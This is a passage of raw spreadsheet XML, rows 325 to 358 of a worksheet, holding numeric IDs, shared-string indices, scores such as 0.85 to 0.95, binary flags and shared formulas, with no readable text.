        <v>41</v>
      </c>
      <c r="C325" s="63" t="s">
        <v>1155</v>
      </c>
      <c r="D325" s="62" t="s">
        <v>1156</v>
      </c>
      <c r="E325" s="62" t="s">
        <v>1157</v>
      </c>
      <c r="F325" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G325" s="62">
        <v>0.85</v>
      </c>
      <c r="H325" s="64">
        <v>0.0</v>
      </c>
      <c r="I325" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J325" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K325" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L325" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O325" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="62">
        <v>914.0</v>
      </c>
      <c r="B326" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C326" s="63" t="s">
        <v>1158</v>
      </c>
      <c r="D326" s="62" t="s">
        <v>1159</v>
      </c>
      <c r="E326" s="62" t="s">
        <v>1160</v>
      </c>
      <c r="F326" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G326" s="62">
        <v>0.85</v>
      </c>
      <c r="H326" s="64">
        <v>1.0</v>
      </c>
      <c r="I326" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J326" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K326" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L326" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O326" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="62">
        <v>937.0</v>
      </c>
      <c r="B327" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C327" s="63" t="s">
        <v>1161</v>
      </c>
      <c r="D327" s="62" t="s">
        <v>1162</v>
      </c>
      <c r="E327" s="62" t="s">
        <v>1163</v>
      </c>
      <c r="F327" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G327" s="62">
        <v>0.85</v>
      </c>
      <c r="H327" s="64">
        <v>0.0</v>
      </c>
      <c r="I327" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J327" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K327" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L327" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O327" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="62">
        <v>942.0</v>
      </c>
      <c r="B328" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C328" s="63" t="s">
        <v>1164</v>
      </c>
      <c r="D328" s="62" t="s">
        <v>1165</v>
      </c>
      <c r="E328" s="62" t="s">
        <v>1166</v>
      </c>
      <c r="F328" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G328" s="62">
        <v>0.9</v>
      </c>
      <c r="H328" s="64">
        <v>1.0</v>
      </c>
      <c r="I328" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J328" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K328" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L328" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O328" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="62">
        <v>982.0</v>
      </c>
      <c r="B329" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C329" s="63" t="s">
        <v>1167</v>
      </c>
      <c r="D329" s="62" t="s">
        <v>1168</v>
      </c>
      <c r="E329" s="62" t="s">
        <v>1169</v>
      </c>
      <c r="F329" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G329" s="62">
        <v>0.9</v>
      </c>
      <c r="H329" s="64">
        <v>0.0</v>
      </c>
      <c r="I329" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J329" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K329" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L329" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O329" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="62">
        <v>983.0</v>
      </c>
      <c r="B330" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C330" s="63" t="s">
        <v>1170</v>
      </c>
      <c r="D330" s="62" t="s">
        <v>1171</v>
      </c>
      <c r="E330" s="62" t="s">
        <v>1172</v>
      </c>
      <c r="F330" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G330" s="62">
        <v>0.85</v>
      </c>
      <c r="H330" s="64">
        <v>1.0</v>
      </c>
      <c r="I330" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J330" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K330" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L330" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O330" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="62">
        <v>993.0</v>
      </c>
      <c r="B331" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C331" s="63" t="s">
        <v>1173</v>
      </c>
      <c r="D331" s="62" t="s">
        <v>1174</v>
      </c>
      <c r="E331" s="62" t="s">
        <v>1175</v>
      </c>
      <c r="F331" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G331" s="62">
        <v>0.85</v>
      </c>
      <c r="H331" s="64">
        <v>0.0</v>
      </c>
      <c r="I331" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J331" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K331" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L331" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="M331" s="62"/>
      <c r="O331" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="62">
        <v>1005.0</v>
      </c>
      <c r="B332" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C332" s="63" t="s">
        <v>1176</v>
      </c>
      <c r="D332" s="62" t="s">
        <v>1177</v>
      </c>
      <c r="E332" s="62" t="s">
        <v>1178</v>
      </c>
      <c r="F332" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G332" s="62">
        <v>0.95</v>
      </c>
      <c r="H332" s="64">
        <v>1.0</v>
      </c>
      <c r="I332" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J332" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K332" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L332" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O332" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="62">
        <v>1022.0</v>
      </c>
      <c r="B333" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C333" s="63" t="s">
        <v>1179</v>
      </c>
      <c r="D333" s="62" t="s">
        <v>1180</v>
      </c>
      <c r="E333" s="62" t="s">
        <v>1181</v>
      </c>
      <c r="F333" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G333" s="62">
        <v>0.85</v>
      </c>
      <c r="H333" s="64">
        <v>1.0</v>
      </c>
      <c r="I333" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J333" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K333" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L333" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O333" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="62">
        <v>1086.0</v>
      </c>
      <c r="B334" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C334" s="63" t="s">
        <v>1182</v>
      </c>
      <c r="D334" s="62" t="s">
        <v>1183</v>
      </c>
      <c r="E334" s="62" t="s">
        <v>1184</v>
      </c>
      <c r="F334" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G334" s="62">
        <v>0.9</v>
      </c>
      <c r="H334" s="64">
        <v>1.0</v>
      </c>
      <c r="I334" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J334" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K334" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L334" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O334" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="62">
        <v>1173.0</v>
      </c>
      <c r="B335" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C335" s="63" t="s">
        <v>1185</v>
      </c>
      <c r="D335" s="62" t="s">
        <v>1186</v>
      </c>
      <c r="E335" s="62" t="s">
        <v>1187</v>
      </c>
      <c r="F335" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G335" s="62">
        <v>0.9</v>
      </c>
      <c r="H335" s="64">
        <v>1.0</v>
      </c>
      <c r="I335" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J335" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K335" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L335" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O335" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="62">
        <v>1183.0</v>
      </c>
      <c r="B336" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C336" s="63" t="s">
        <v>1188</v>
      </c>
      <c r="D336" s="62" t="s">
        <v>1189</v>
      </c>
      <c r="E336" s="62" t="s">
        <v>1190</v>
      </c>
      <c r="F336" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G336" s="62">
        <v>0.85</v>
      </c>
      <c r="H336" s="64">
        <v>0.0</v>
      </c>
      <c r="I336" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J336" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K336" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L336" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O336" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="62">
        <v>1184.0</v>
      </c>
      <c r="B337" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C337" s="63" t="s">
        <v>1191</v>
      </c>
      <c r="D337" s="62" t="s">
        <v>1192</v>
      </c>
      <c r="E337" s="62" t="s">
        <v>1193</v>
      </c>
      <c r="F337" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G337" s="62">
        <v>0.85</v>
      </c>
      <c r="H337" s="64">
        <v>0.0</v>
      </c>
      <c r="I337" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J337" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K337" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L337" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O337" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="62">
        <v>1190.0</v>
      </c>
      <c r="B338" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C338" s="63" t="s">
        <v>1194</v>
      </c>
      <c r="D338" s="62" t="s">
        <v>1195</v>
      </c>
      <c r="E338" s="67" t="s">
        <v>1196</v>
      </c>
      <c r="F338" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G338" s="62">
        <v>0.9</v>
      </c>
      <c r="H338" s="64">
        <v>0.0</v>
      </c>
      <c r="I338" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J338" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K338" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L338" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O338" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="62">
        <v>1198.0</v>
      </c>
      <c r="B339" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C339" s="63" t="s">
        <v>1197</v>
      </c>
      <c r="D339" s="62" t="s">
        <v>1198</v>
      </c>
      <c r="E339" s="62" t="s">
        <v>1199</v>
      </c>
      <c r="F339" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G339" s="62">
        <v>0.95</v>
      </c>
      <c r="H339" s="64">
        <v>1.0</v>
      </c>
      <c r="I339" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J339" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K339" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L339" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O339" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="62">
        <v>1217.0</v>
      </c>
      <c r="B340" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C340" s="63" t="s">
        <v>1200</v>
      </c>
      <c r="D340" s="62" t="s">
        <v>1201</v>
      </c>
      <c r="E340" s="62" t="s">
        <v>1202</v>
      </c>
      <c r="F340" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G340" s="62">
        <v>0.85</v>
      </c>
      <c r="H340" s="64">
        <v>0.0</v>
      </c>
      <c r="I340" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J340" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K340" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L340" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O340" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="62">
        <v>1280.0</v>
      </c>
      <c r="B341" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C341" s="63" t="s">
        <v>1203</v>
      </c>
      <c r="D341" s="62" t="s">
        <v>1204</v>
      </c>
      <c r="E341" s="62" t="s">
        <v>1205</v>
      </c>
      <c r="F341" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G341" s="62">
        <v>0.85</v>
      </c>
      <c r="H341" s="64">
        <v>1.0</v>
      </c>
      <c r="I341" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J341" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K341" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L341" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O341" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="62">
        <v>1701.0</v>
      </c>
      <c r="B342" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C342" s="63" t="s">
        <v>1206</v>
      </c>
      <c r="D342" s="62" t="s">
        <v>1207</v>
      </c>
      <c r="E342" s="62" t="s">
        <v>1208</v>
      </c>
      <c r="F342" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G342" s="62">
        <v>0.9</v>
      </c>
      <c r="H342" s="64">
        <v>1.0</v>
      </c>
      <c r="I342" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J342" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K342" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L342" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O342" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="62">
        <v>1775.0</v>
      </c>
      <c r="B343" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C343" s="63" t="s">
        <v>1209</v>
      </c>
      <c r="D343" s="62" t="s">
        <v>1210</v>
      </c>
      <c r="E343" s="62" t="s">
        <v>1211</v>
      </c>
      <c r="F343" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G343" s="62">
        <v>0.9</v>
      </c>
      <c r="H343" s="64">
        <v>1.0</v>
      </c>
      <c r="I343" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J343" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K343" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L343" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O343" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="62">
        <v>2010.0</v>
      </c>
      <c r="B344" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C344" s="63" t="s">
        <v>1212</v>
      </c>
      <c r="D344" s="62" t="s">
        <v>1213</v>
      </c>
      <c r="E344" s="62" t="s">
        <v>1214</v>
      </c>
      <c r="F344" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G344" s="62">
        <v>0.85</v>
      </c>
      <c r="H344" s="64">
        <v>1.0</v>
      </c>
      <c r="I344" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J344" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K344" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L344" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O344" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="62">
        <v>2047.0</v>
      </c>
      <c r="B345" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C345" s="63" t="s">
        <v>1215</v>
      </c>
      <c r="D345" s="62" t="s">
        <v>1216</v>
      </c>
      <c r="E345" s="62" t="s">
        <v>1217</v>
      </c>
      <c r="F345" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G345" s="62">
        <v>0.85</v>
      </c>
      <c r="H345" s="64">
        <v>0.0</v>
      </c>
      <c r="I345" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J345" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K345" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L345" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O345" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="62">
        <v>2154.0</v>
      </c>
      <c r="B346" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C346" s="63" t="s">
        <v>1218</v>
      </c>
      <c r="D346" s="62" t="s">
        <v>1219</v>
      </c>
      <c r="E346" s="62" t="s">
        <v>1220</v>
      </c>
      <c r="F346" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G346" s="62">
        <v>0.95</v>
      </c>
      <c r="H346" s="64">
        <v>1.0</v>
      </c>
      <c r="I346" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J346" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K346" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L346" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O346" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="62">
        <v>2193.0</v>
      </c>
      <c r="B347" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C347" s="63" t="s">
        <v>1221</v>
      </c>
      <c r="D347" s="62" t="s">
        <v>1222</v>
      </c>
      <c r="E347" s="62" t="s">
        <v>1223</v>
      </c>
      <c r="F347" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G347" s="62">
        <v>0.9</v>
      </c>
      <c r="H347" s="64">
        <v>0.0</v>
      </c>
      <c r="I347" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J347" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K347" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L347" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O347" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="62">
        <v>2251.0</v>
      </c>
      <c r="B348" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C348" s="63" t="s">
        <v>1224</v>
      </c>
      <c r="D348" s="62" t="s">
        <v>1225</v>
      </c>
      <c r="E348" s="62" t="s">
        <v>1226</v>
      </c>
      <c r="F348" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G348" s="62">
        <v>0.95</v>
      </c>
      <c r="H348" s="64">
        <v>1.0</v>
      </c>
      <c r="I348" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J348" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K348" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L348" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O348" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="62">
        <v>2475.0</v>
      </c>
      <c r="B349" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C349" s="63" t="s">
        <v>1227</v>
      </c>
      <c r="D349" s="62" t="s">
        <v>1228</v>
      </c>
      <c r="E349" s="62" t="s">
        <v>1229</v>
      </c>
      <c r="F349" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G349" s="62">
        <v>0.85</v>
      </c>
      <c r="H349" s="64">
        <v>0.0</v>
      </c>
      <c r="I349" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J349" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K349" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L349" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O349" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="62">
        <v>2524.0</v>
      </c>
      <c r="B350" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C350" s="63" t="s">
        <v>1230</v>
      </c>
      <c r="D350" s="62" t="s">
        <v>1231</v>
      </c>
      <c r="E350" s="62" t="s">
        <v>1232</v>
      </c>
      <c r="F350" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G350" s="62">
        <v>0.9</v>
      </c>
      <c r="H350" s="64">
        <v>1.0</v>
      </c>
      <c r="I350" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J350" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K350" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L350" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M350" s="62" t="s">
        <v>1233</v>
      </c>
      <c r="N350" s="62" t="s">
        <v>199</v>
      </c>
      <c r="O350" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="62">
        <v>2525.0</v>
      </c>
      <c r="B351" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C351" s="63" t="s">
        <v>1234</v>
      </c>
      <c r="D351" s="62" t="s">
        <v>1231</v>
      </c>
      <c r="E351" s="62" t="s">
        <v>1235</v>
      </c>
      <c r="F351" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G351" s="62">
        <v>0.95</v>
      </c>
      <c r="H351" s="64">
        <v>1.0</v>
      </c>
      <c r="I351" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J351" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K351" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L351" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O351" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="62">
        <v>2538.0</v>
      </c>
      <c r="B352" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C352" s="63" t="s">
        <v>1236</v>
      </c>
      <c r="D352" s="62" t="s">
        <v>1237</v>
      </c>
      <c r="E352" s="62" t="s">
        <v>1238</v>
      </c>
      <c r="F352" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G352" s="62">
        <v>0.9</v>
      </c>
      <c r="H352" s="64">
        <v>1.0</v>
      </c>
      <c r="I352" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J352" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K352" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L352" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M352" s="62" t="s">
        <v>1239</v>
      </c>
      <c r="N352" s="62" t="s">
        <v>199</v>
      </c>
      <c r="O352" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="62">
        <v>2566.0</v>
      </c>
      <c r="B353" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C353" s="63" t="s">
        <v>1240</v>
      </c>
      <c r="D353" s="62" t="s">
        <v>1241</v>
      </c>
      <c r="E353" s="62" t="s">
        <v>1242</v>
      </c>
      <c r="F353" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G353" s="62">
        <v>0.85</v>
      </c>
      <c r="H353" s="64">
        <v>0.0</v>
      </c>
      <c r="I353" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J353" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K353" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L353" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O353" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="62">
        <v>2643.0</v>
      </c>
      <c r="B354" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C354" s="63" t="s">
        <v>1243</v>
      </c>
      <c r="D354" s="62" t="s">
        <v>1244</v>
      </c>
      <c r="E354" s="62" t="s">
        <v>1245</v>
      </c>
      <c r="F354" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G354" s="62">
        <v>0.9</v>
      </c>
      <c r="H354" s="64">
        <v>1.0</v>
      </c>
      <c r="I354" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J354" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K354" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L354" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O354" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="62">
        <v>2650.0</v>
      </c>
      <c r="B355" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C355" s="63" t="s">
        <v>1246</v>
      </c>
      <c r="D355" s="62" t="s">
        <v>1247</v>
      </c>
      <c r="E355" s="62" t="s">
        <v>1248</v>
      </c>
      <c r="F355" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G355" s="62">
        <v>0.9</v>
      </c>
      <c r="H355" s="64">
        <v>1.0</v>
      </c>
      <c r="I355" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J355" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K355" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L355" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O355" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="62">
        <v>2710.0</v>
      </c>
      <c r="B356" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C356" s="63" t="s">
        <v>1249</v>
      </c>
      <c r="D356" s="62" t="s">
        <v>1250</v>
      </c>
      <c r="E356" s="62" t="s">
        <v>1251</v>
      </c>
      <c r="F356" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G356" s="62">
        <v>0.85</v>
      </c>
      <c r="H356" s="64">
        <v>1.0</v>
      </c>
      <c r="I356" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J356" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K356" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L356" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O356" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="62">
        <v>2763.0</v>
      </c>
      <c r="B357" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C357" s="63" t="s">
        <v>1252</v>
      </c>
      <c r="D357" s="62" t="s">
        <v>1253</v>
      </c>
      <c r="E357" s="62" t="s">
        <v>1254</v>
      </c>
      <c r="F357" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G357" s="62">
        <v>0.85</v>
      </c>
      <c r="H357" s="64">
        <v>0.0</v>
      </c>
      <c r="I357" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J357" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K357" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L357" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O357" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="62">
        <v>2766.0</v>
      </c>
      <c r="B358" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C358" s="63" t="s">
        <v>1255</v>
      </c>
      <c r="D358" s="62" t="s">
        <v>1256</v>
      </c>
      <c r="E358" s="62" t="s">
        <v>1257</v>
      </c>
      <c r="F358" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G358" s="62">
        <v>0.85</v>
      </c>
